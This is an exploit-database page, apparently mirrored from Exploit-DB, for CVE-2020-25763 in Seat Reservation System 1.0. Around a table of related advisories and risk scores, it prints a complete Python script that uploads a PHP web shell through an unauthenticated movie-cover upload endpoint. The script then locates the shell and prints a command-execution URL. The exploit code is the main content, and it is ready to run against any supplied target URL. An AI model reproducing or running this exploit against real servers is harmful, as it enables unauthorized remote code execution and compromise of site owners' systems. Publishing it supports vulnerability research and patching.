Vulners
Lucene search
Seat Reservation System 1.0 - Remote Code Execution (Unauthenticated)
šļøĀ 16 Oct 2020Ā 00:00:00Reported byĀ Rahul RamkumarTypeĀ 
Ā exploitdbšĀ www.exploit-db.comšĀ 338Ā Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | CVE-2020-25763 | 30 Sep 202022:58 | ā | circl |
 | Seat Reservation System Arbitrary File Upload (CVE-2020-25763) | 25 Nov 202000:00 | ā | checkpoint_advisories |
 | CVE-2020-25763 | 29 Sep 202019:17 | ā | cve |
 | CVE-2020-25763 | 29 Sep 202019:17 | ā | cvelist |
 | CVE-2020-25763 | 30 Sep 202018:15 | ā | nvd |
 | CVE-2020-25763 | 30 Sep 202018:15 | ā | osv |
 | Seat Reservation System 1.0 Shell Upload | 21 Sep 202000:00 | ā | packetstorm |
 | Unrestricted file upload | 30 Sep 202018:15 | ā | prion |
 | CVE-2020-25763 | 22 May 202517:55 | ā | redhatcve |
# Exploit Title: Seat Reservation System 1.0 - Unauthenticated Remote Code Execution
# Exploit Author: Rahul Ramkumar
# Date: 2020-09-16
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Version: 1.0
# Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1
# Exploit Tested Using: Python 2.7.18
# CVE: CVE-2020-25763
# Vulnerability Description:
# Seat Reservation System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading PHP files.
import requests, sys, urllib, re
from lxml import etree
from io import StringIO
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
import random
import string
def print_usage(STRING):
return Style.BRIGHT+Fore.YELLOW+STRING+Fore.RESET
if __name__ == "__main__":
if len(sys.argv) != 2:
print print_usage("Usage:\t\t python %s <WEBAPP_URL>" % sys.argv[0])
print print_usage("Example:\t python %s 'https://192.168.1.72:443/seat_reservation/'" % sys.argv[0])
sys.exit(-1)
SERVER_URL = sys.argv[1]
UPLOAD_DIR = 'admin/ajax.php?action=save_movie'
UPLOAD_URL = SERVER_URL + UPLOAD_DIR
random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(16)])
webshell = random+'.php'
s = requests.Session()
s.get(SERVER_URL, verify=False)
image = {
'cover':
(
webshell,
'<?php echo shell_exec($_GET["d3crypt"]); ?>',
'application/php',
{'Content-Disposition': 'form-data'}
)
}
fdata = {'id': '','title':'Shelling','description':'','duration_hour':'3','duration_min':'0','date_showing':'2020-01-01','end_date':'2040-09-25'}
r1 = s.post(url=UPLOAD_URL, files=image, data=fdata, verify=False)
r2 = s.get(SERVER_URL, verify=False)
response_page = r2.content.decode("utf-8")
parser = etree.HTMLParser()
tree = etree.parse(StringIO(response_page), parser=parser)
def get_links(tree):
refs = tree.xpath("//img")
links = [link.get('src', '') for link in refs]
return [l for l in links]
links = get_links(tree)
print('Access your webshell at: ')
for link in links:
if webshell in link:
print(SERVER_URL + link+'?d3crypt=whoami')Data
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2020 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.12349